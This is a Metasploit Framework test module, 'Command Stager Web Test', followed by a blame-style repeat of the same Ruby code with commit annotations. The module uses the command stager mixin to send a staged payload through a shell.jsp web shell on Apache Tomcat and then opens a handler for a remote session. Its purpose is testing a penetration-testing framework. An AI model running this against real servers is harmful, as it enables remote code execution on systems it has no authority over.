metasploit-framework/modules/exploits/test/cmdweb.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	# =( need more targets and perhaps more OS specific return values OS specific would be preferred

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::CmdStager

	def initialize(info = {})
		super(update_info(info,
			'Name'	      => 'Command Stager Web Test',
			'Description'  => %q{
					This module tests the command stager mixin against a shell.jsp application installed
				on an Apache Tomcat server.
			},
			'Author'	=> 'bannedit',
			'Version' => '$Revision$',
			'References' =>
				[
				],
			'DefaultOptions' =>
				{
				},
			'Payload' =>
				{
				},
			'Platform' => 'win',
			'Privileged' => true,
			'Targets' =>
				[
					# need more but this will likely cover most cases
					[ 'Automatic Targeting',
						{
							'auto' => true
						}
					],
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Feb 03 2010'))

		register_options(
			[
				Opt::RPORT(8080),
			], self.class)
	end

	def autofilter
		false
	end

	def exploit

		cstager = generate_cmdstager()
		http_send_cmd({'uri' => "/shell/shell.jsp?cmd=CMDS"}, delay = 0.5)

		handler
	end

end
commit cmd stager stuff from bannedit git-svn-id: file:///home/svn/framework3/trunk@8518 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-16 16:38:19 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`


			`require 'msf/core'`


			`class Metasploit3 < Msf::Exploit::Remote`
			`# =( need more targets and perhaps more OS specific return values OS specific would be preferred`

			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::CmdStager`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Command Stager Web Test',`
			`'Description' => %q{`
			`This module tests the command stager mixin against a shell.jsp application installed`
			`on an Apache Tomcat server.`
			`},`
			`'Author' => 'bannedit',`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`],`
			`'DefaultOptions' =>`
			`{`
			`},`
			`'Payload' =>`
			`{`
			`},`
			`'Platform' => 'win',`
			`'Privileged' => true,`
			`'Targets' =>`
			`[`
			`# need more but this will likely cover most cases`
			`[ 'Automatic Targeting',`
			`{`
			`'auto' => true`
			`}`
			`],`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Feb 03 2010'))`

			`register_options(`
			`[`
			`Opt::RPORT(8080),`
			`], self.class)`
			`end`

Filter this from automation git-svn-id: file:///home/svn/framework3/trunk@8558 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-19 05:15:03 +00:00			`def autofilter`
			`false`
			`end`
commit cmd stager stuff from bannedit git-svn-id: file:///home/svn/framework3/trunk@8518 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-16 16:38:19 +00:00
			`def exploit`

			`cstager = generate_cmdstager()`
			`http_send_cmd({'uri' => "/shell/shell.jsp?cmd=CMDS"}, delay = 0.5)`

			`handler`
			`end`

			`end`
Filter this from automation git-svn-id: file:///home/svn/framework3/trunk@8558 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-19 05:15:03 +00:00